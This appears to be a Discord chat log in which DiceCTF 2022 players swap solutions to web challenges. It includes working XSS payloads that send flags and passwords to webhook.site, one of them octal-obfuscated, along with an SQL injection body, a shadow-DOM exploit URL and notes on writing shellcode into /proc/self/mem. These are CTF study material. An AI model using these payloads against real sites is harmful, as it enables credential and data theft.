#web

suddenly? or after some time?

why wont you released the flare writeup?

shadow is so hard without a click 😭

shadow looks unsolvable...

uh...no guarantees

im thinking its a shadow dom 0day

😄

waiting for the solution! going to learn something new! great chals guys!

shadow does not require a 0day 😑

hahaha

no-cookies giving brain damage

gonna enjoy reading the writeups for a few of these challenges

No give us your 0days please

ok dirbusting now /j

need wp of no-cookies

maximum i got - text highlited without css change)))

why use css when you can use whatever magic this man is on

got writeup for this?

All I got was figuring out how to get around the csp issue

yeah ill post my writeups when i finish writing them after the CTF is over

The challenges will be on after ctf ?

there's a CSP?

the challenges will stay online for a bit

hint in 4 minutes? 😉

cursed denoblog remote

man used his mouse to select text

know it existed but don't know how it exactly worked(text highlight) https://github.com/bokand/ScrollToTextFragment/blob/main/README.md

locally working exploit 😭

not the only way to select text programatically

you can use JS to select text too

but then i need access to this text)))

hey now lets not discuss

challenges will be online for a bit

but not forever because we are using our own money

We want test the challenges with writeups and take some notes 😄

yea we are currently thinking 2 weeks

we will take money to extend it tho 😉

asdjhasiudhasiudhaisuhdasuid i thinki have something for shadow but idk how to exploit

asidjoasjdoaisjd

All the XSS in no-cookies couldn't get me the damn unencrypted password 😦

Is it finally over ? 😄

gg

yall should extend it by 30 minutes fr

🥲

vm-calc writeup????

nooooooo

No Cookie please 😄

sqli and xss were not enough to solve no-cookies 😦

fakkkkkkkkkk

and notekeeper

Got my ass kicked by the web challenges, but it was pretty fun

almost solved shadow if the bot could click anywhere for once 😭

what

those 2 drove me crazy

we got the flag

30 secondsssssssss

GG!

shadow solution plz

^^ this guy

LMFAO

what was blazingfast?

literally 30 seconds

omg

pleaseee someone explain how blazingfast is solved

nooooooooo

omg

@candid coral which chal?

flare ? could it be done via warp and http/3? seems cloudflare fixed it

shadow

RIP

oof

blazingfast solution:

fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl<img src=x onerror="''['\141\164']['\137\137\160\162\157\164\157\137\137']['\143\157\156\163\164\162\165\143\164\157\162']('\146\145\164\143\150(`\150\164\164\160\163://\167\145\142\150\157\157\153.\163\151\164\145/90396\1465\141-59\146\141-40\146\145-\14182\146-\145\14421\1415\14611009?Q=${\154\157\143\141\154S\164\157\162\141\147\145.\146\154\141\147}`)')()"/>

welcome to the gang

lmao

i wanna cry lol

no-cookies please

(can we just give it to them)

i wont say anything

Where did you see this?

In 1 run?

Did they already released official writeups?

yea can be done in one

What is the solution for vmcalc . Is it 0day in vm2

yes

im still working on writeups

wait a little longer :>

but no

vm-calc was not a vm2 0day

it was a nodejs 1-day

:D

🤠

https://nodejs.org/en/blog/vulnerability/jan-2022-security-releases/

what was nocookies?

how far did u get

@vital umbra want to tell them

lmfaooo

toxic

????

i dont know where to start

we got sqli + xss

That's my doubt... At least where my dumb analysis went, the mock() function would stop in the first tag opening and return 1, stoping the rest of the execution.

oh

um after sqli + xss you peer into the global RegExp object

js moment incoming

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/RegExp/input

js moment

JS MOMENT

with nocookies I got into XSS, also got sqlite3 error and dom clobbering but no idea

god i love javascript

what was shadow , that got all of my time

the fuck

lmao

JS CTF

nice

basically the password is in RegExp.input 🙂

Shiiiiiiiiiiiiiiiiiiiittttttt..... I even generated a HeapDump of a XSS-ed Chrome window to look for some global object, but I couldn't find the path for it.

oh noo 😭

😔

I was trying to find a Request object with the password stored.

ahh i see

That was really great!! I'm looking forward for the writeups

mad at myself for coughing up 5$ for warp+ for flare just in case

flare solution ?

you can get free warp+ with cloudflare teams

So frustrated with denoblog, had an exploit that was reliable locally, nothing happening remotely

it didn't work for me either way

oof sorry

any carrot writeups?

@vital umbra i got into the rabbit hole due to the fact that you could specify the instance value different from the url, so the first promise wasn't resolved. Thought maybe we could somehow trigger only 1 dialog and then navigate to /register so that the bot registers with the password in the login 🙂 theoretically possible, but obviously unintended

curious about denoblog too, very interesting, even with inotify i couldn't find any other temp files or anything

At the last minutes I got the encrypted password just to check 😄 lol

So shadow write up is first comming tomorrow?

Lol nginx moments

you had to bruteforce both pid and fd

ah I see, i was worried about that but i thought it would be okay

Like, we had the right pid/fd from nginx bc we could exfil etc/passwd

oh you could access it from a nginx worker process...?

but the shellcode didn't take

did you try to write into the ejs?

how did u write ur shellcode?

hxp include stuff + write to /proc/self/mem

that worked for us remotely

wait guys let's ask for shadow fucking stuff with no solves

after parsing /proc/self/maps

ok how about flare?

shadow solution won't be given for a week i believe

Wriiteup for Blazingfast please. Not sure what the vulnerability there was

why?

flare writeup ?

the length can change after touppercase iirc

from announcement:

thxx

the grind continues

blazingfast's vuln is buffer didn't get clear right?

well. now we can talk about shadow?

no

thats a vuln but it doesnt get triggered

looking for writeup 👀

how to get steal me focused?)

spend tons of time in that buffer rabbit hole

.

I'll give u that 50$ just tell me how to read that shadow dom stuff

what was the flare bug?

e.g. ß become SS when uppercase

I'm kinda curious to see how carrot was meant to be solved. We spent a lot of time trying to get CSRF + XSleaks through timing attacks to work but we weren't able to reliably time the onload

ditto

yea what was carot

☝️

Carrot (unintendet: jinja2 is super slow)
https://gist.github.com/kunte0/47c2b53535605d842f984e77d6c63eed

bruh

❤️

how long did it took you?

2 times

i mean hours

or minutes

Now I got the detail. The password is stored in the Regexp.input by the validate function. Shit. Really nice.

i had most of it ready

but 4h

Haha thanks. Sorry if it was too obscure 😅

👍

just this was missing oof

Dang, I was looking at the wrong xsleak method

btw if you want to try to do intended, reduce the request body limit to ~200k instead 😉

ok so you can release web shadow writeup now?

pls

okay, fine

.

we'll release it soon

👀

Something about flare?

flare wont happen probably

web/shadow now released

wow

thanks

nooo

we had almost all of it

we were just missing find

😭

ahahah

yep

@vital umbra link?

#writeups

oh

i was missing the insertHTML bit

https://hackmd.io/fmdfFQ2iS6yoVpbR3KCiqQ

but ig thats like half the exploit lmao

damn

i thought of insertHTML

but i couldn't figure out how to get the cursor in

first time knowing there is window.find wtf

is there a writeup for knock-knock

the same. But i think more ctfs = understand more features like this

i can add an explanation into the organizer writeup page

ty

@fleet vale how did you bypass 16 char limit in notekeeper ?

exactly same

you supply an array instead of a string

here are writeups for notekeeper, vm-calc, denoblog, and larry's challenge blazingfast:

https://brycec.me/posts/dicectf_2022_writeups

:D

GOD DAMNIT

@fleet vale also rip no one solved noteKeeper with serviceworkers

I didnt know about the cached input.
Nice to learn and brought new ideas

but your js method was very cool too!

forgot abt that 😅

what did sg use?

window.opener.document.write

the secret key for the hmac was using randomUUID but didn't actually call it; so instead of it being a UUID it was just [Function function] or something like that

ah k

no it was the source code for randomUUID

yeah

because it gets converted to a string

kinda meme

but that is why exact node version was important

so docker was given

for which part?

jsonp to full javascript execution

we used opener.document.write

oh didnt see this

😭 service workers my beloved

I assumed it'd be converted to 'undefined' if that was the case

Eventually had to set up the docker to get it

😂

for denoblog, in my testing on the docker I thought that the deno process cannot read nginx's temp file

since it runs as nobody

and i got perm errors in my logs

So no one knows about flare?

those directories were owned by root in my docker

maybe i deleted a line or something dumb in the dockerfile

ohh it's the child process

i'm dumb

where did denoblog solvers overwrite /proc/self/mem?

i just had checked nginx's parent process

we created a wasm thing, searched for the rwx page, wrote shellcode to the beginning of the page and called the wasm function

oh i see! thats really cool

it was surprisingly easy

makes sense makes sense

i just found some fn in deno then overwrote that

failed solver, but worked locally We overwrote the code for deno_runtime::permissions::PermissionState::check and then try to do something else that requires permission 🙂

tried to patch it to just always return "go ahead", but couldn't be bothered to figure out the proper structure for the return value

ah i see

rip

that seems tough, i struggled along that path for like an hour before trying something else when test solving

any wp of no-cookies

We just changed seek offset until nop slip worked

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/RegExp/input

Non-standard: This feature is non-standard and is not on a standards track. Do not use it on production sites facing the Web: it will not work for every user. There may also be large incompatibilities between implementations and the behavior may change in the future.

this is what you love to see

tried a nop sled too in the final minutes, still didn't work :/

on top of a mdn doc

i was scared it would get patched out

Were you crashing the backend?

Somehow, no

We were getting nginx backend error after overwrite

Locally, yes

because we exit'd

the remote just kept giving internal server errors

How do you know you were hitting right pid?

We could exfil /etc/passwd with a different payload

so the sqli in nocookie was useless

you needed it for xss, right?

at least that's how we got xss

i had xss

with the markdown

with markdown you couldnt use RegExp.input since it would overwrite :)

a[d](b"onfocus=alert`23` autofocus tabindex=1 ")z

lol we didnt even find that

the markdown xss was kind of an accident

i added a markdown mode to justify innerHTML and i let copilot write a bootleg markdown renderer

copilot moment

and that introduced xss, but i left it in because it was kinda funny

because you can't do the RegExp.$_ thing after

copilot 💀

copilot writing vulns in code

copilot traaaash

copilot == backdoor stuffs

this was all copilot lol

Flare writeup?

🙏 copilot keeping our jobs secure

or insecure

depending on who you are

so try to write more vuln codes in your github page

ok time to find real author of the markdown writer and get some xss bounties on websites he developed

🧠 ...

Promise share bounties with me 🙂

you go try find the sqli author if that was also built with copilot

requires a cloudflare 0day

oOoOo yesss sqli has more bounties

i figured you somehow need to get the origin IP

i suppose you could just try all public IPs to find the origin IP then directly connect and set CF-Connecting-IP?

how?

/proc/self/mem

++

Nope, seemed like it was verifying CF mTLS

yeah i was thinking of just fuzzing that header with all ipv4 but I think that level of requests would be against rules

well actually you'd be fuzzing CF so prob fine

CF can eat any amount of spam you can possibly create on your own

but no that is not the way

that sounds like a fast way to get cloudflare to start dropping all requests from your IP

i believe it was something like this too

hoping for a writeup though

I tried CNAMEing to flare.mc.ax from a Cloudflare domain I control but CF has a special error for that: http://no.cogzap.com/

we tried CF worker stuff, but no shot

likely all fixed already

i know how i got the flare flag but i don't know why it's working

🙃

what did you try?

start WARP VPN and open https://flare.mc.ax

boom you see the flag

huh hm

erm, tried warp, didn't work for me

try disabling your native IPv4 and connect to WARP with IPv6 only?

god dammit

rip

LOL

lmao

ah, so it's ipv6, alright

haha

please dont release writeup you're gonna get all the skids

to spoofing IPs

i even connected an aws instance with ipv6 to warp but then got distracted lol

lol

well it's already public, you can find people complaining about this stuff

smh why did you make it a chall then if you didnt want it leeked

the audience was different

well, some lucky but poor BGP Player has only IPv6 access for his VMs

🙃

I accidentally brought it to the wrong audience

but i tried to re-create this challenge and failed

so it had nothing to do with finding the origin server ip?

wow

was the solution warp?

i dont really know what's required for setting up on cloudflare side

nothing required

you can't reproduce

if your backend is ipv6

this only works because of the ipv6 -> ipv4 interaction cloudflare

yes

so I do have it pointed to an ipv4 server

uhhhh

no idea then

and i got this on my nginx

wait but 242.179.244.41

is a bogon?

so this is a reproduction

this is with this option on

oh

uh

one sec

but i don't think it's private...?

or it's just im idiot and it indeed is private?

its not technically private

i have no idea why python thinks its private

its Class E

wtf

okay then

https://en.wikipedia.org/wiki/Classful_network#Classful_addressing_definition

they're bogons

Class E is reserved and cannot be used on the public Internet.

but technically just because they're "not public" doesn't mean they're private

those are two different things by classful network definition

well it's reasonable enough then

its reasonable enough

but <insert IEEE/RFC standard here>

yeah

there are specific defined private-use networks tho

https://datatracker.ietf.org/doc/html/rfc8962

Cloudflare: we perfectly executed this RFC

haha

anyway

shadow writeup?

linked in #announcements and #writeups

what was no-cookies writeup @vital umbra ,during ctf i successfully found xss,but did not know how to steal flag

earlier conversation up here

lol i havent used regexp thing

<svg><svg/onload="document.querySelector=function(){JSON.stringify=a=>fetch(`https://webhook.site/11b32903-2d6a-4efc-b687-e06a0f0226aa?`+a.password),arguments.callee.caller()}">```

i have replaced JSON.stringify with my own function

and called this funcion

using arguments.callee.caller

good thing it was separated from prompts lol

i still used sqli tho lol

wtf lmao

honestly i wasnt expecting html to parse and script to run before executing line 60

but it worked XD

oh holy shit

i thought is intended solution as this function was separated

the js executed before line 60???

and flag was matching too

yep

lol

🔥

@vital umbra

holy

yeah how did it...?

idk lol i guess parsing html after changing innerHTML is sync

or javascript is super slow XD

thanks @ivory pike , i donot know that we can also use local variables of anonymous function.

we couldnt use it i replaced JSON.stringify as it was called

with password

as argument

in line 30

i am in college

will take a deep look after what you did

anyway thanks dude

no doubt you are the same guy @ivory pike , https://twitter.com/disclosedh1/status/1425219239351365636?s=20&t=PAjViahKCWiDDJhf-GvaGQ

that was an exceptional finding ❤️‍🔥

lol

ty

👏

whoa this is so cool

😎

But there is await for json(), isn't it?? how could the innerHTML be changed before JSON.stringify()?

it was changed after it

but i called anonymous function again

arguments.callee.caller()

so JSON.stringify was called again

with password

how could that sqli be used to xss? I only know the markdown one

just insert a note with html tags

as they were deleted only while adding note

oh arguments.callee.caller() is not a part of JSON.stringify(), I parsed it falsely

ty for your resp

but <> will be removed

ye use sqli to do that

i think my payload looked like this:

"password": "pass"
"note": ", :mode, 0, 0) -- ",
"mode": "actual note and xss"```
(POST to /create)

and mode was used as note content

Didn't you find the markdown xss or that wouldn't work?

Any writeup for flare?

#web message

but offical, but it work for me

smh such 🧀

can i know who solve web/shadow?

he will be a really awesome guy.

this guy 🙂

https://twitter.com/RenwaX23/status/1490434423237615616 lmao

https://tenor.com/view/brooklyn-nine-peralta-99-adam-gif-22554920

actually, we got $50 instead of a notification... maybe it was all planned

https://tenor.com/view/salute-yes-sir-respect-address-aaron-eckhart-gif-14461605

:hackerman: 😋

Why does that give you the anonymous function though? Since it isn’t really calling you right?

Ah I see how it works now

Im replacing document.querySelector

which gets called by this function in line 60

yeah realized that now, really smart!

btw why do you need the onload in that weird spot? I couldnt get it to work otherwise. img onerr was also called "too late". Did you just randomly figure that out or is there some logic to that?

any writeup for shadow

any writeup for flare?

https://hackmd.io/fmdfFQ2iS6yoVpbR3KCiqQ

ty

Super guesser also just posted a more detailed writeup #writeups message

Any idea why svg can read the parent element but img can't?

my guess is that the nested svg is parsed in a different mode (svg mode, not html mode) and thats why it behaves differently

but i guess you have to read the html spec to know for sure

I don't know the exact reason but yeah

just looked at my test solve

seems to work with an img tag for me

https://shadow.mc.ax/?y=-webkit-user-modify:read-write;&x=%3Cimg%20src=x%20onerror=%27document.execCommand(%22FindString%22%2C%20false%2C%20%22steal%22)%3B%20document.execCommand(%22SelectAll%22)%3B%20document.execCommand(%22insertHTML%22%2C%20false%2C%20%60%3Cimg%20src%3Dx%20onerror%3D%22alert(this.parentNode.parentNode.outerHTML)%22%20%2F%3E%60)%3B%27/%3E

ig you just need to get the 2nd parent if using img tag?

I was having issues when I originally tried using an img tag too but I don't remember the reason

oh it appears to be my document.execCommand('SelectAll');

wack

i guess img onerror is loaded async as it needs response from server to run handler onload/onerror

and i just asked @plush quest does he know any xss payload

and he send me svg onload xD

hmm yeah

Still not sure of the exact reason here

I think the img tag is being removed from dom before onerror is fired unless you do SelectAll?

Could be totally wrong

yeah that might be it

it just seems to not have any parent

weird

this is what the dom looks like without the SelectAll

this and the $0 img tag in the elements tab somehow are different elements?

wack

wait how tf did i find document.execCommand "FindString"

thats not even documented

i love js

oh wait @knotty tinsel how did u find that lmao

maybe it's more like a hidden feature only implemented by webkit and blink, it's mentioned here: https://w3c.github.io/editing/docs/execCommand/#:~:text=will bear investigation.-,findString,-%2C fontSizeDelta%2C insertNewlineInQuotedContent%2C justifyNone

iirc arx found it in chrome source lol

more commands: https://chromium.googlesource.com/chromium/src/+/refs/tags/100.0.4875.3/third_party/blink/renderer/core/editing/commands/editor_command_names.h#35

yea

god tier research

🤣

both of them dont work

why?

Are you using node 17.4.0?

Oh, no

I have upgraded and still not working

index.js :

I'd guess because you're on Windows

❯ cat index.js
const crypto = require('crypto');
console.log(crypto.createHmac('sha256', `secret-${crypto.randomUUID}`).update('0').digest('hex'))
❯ /usr/local/bin/node -v
v17.4.0
❯ /usr/local/bin/node index.js
7bd881fe5b4dcc6cdafc3e86b4a70e07cfd12b821e09a81b976d451282f6e264

whats the output of ```js
secret-${crypto.randomUUID}

might be line endings?

I think it's \r\n on Windows, because I can reproduce 1ac7056f7beb7929213e625824620dbda59bd519c706fda69f9aca1bd914c175 after replace all \n to \r\n

console.log(
  crypto.createHmac('sha256',
    `secret-${crypto.randomUUID.toString().replaceAll('\n', '\r\n')}`)
  .update('0').digest('hex')
)

ohh i see then i could have gotten my answer like this

Thanks!

i mean you should really have ran the docker image though

then you don't need to deal with platform-specific issues like that

!!

I've quoted this one comment so many times 🙃

FWIW, https://github.com/traefik/traefik/security/advisories/GHSA-hrhx-6h34-j5hc was what i used for flare

Unintended 0day be like

@feral hill 👀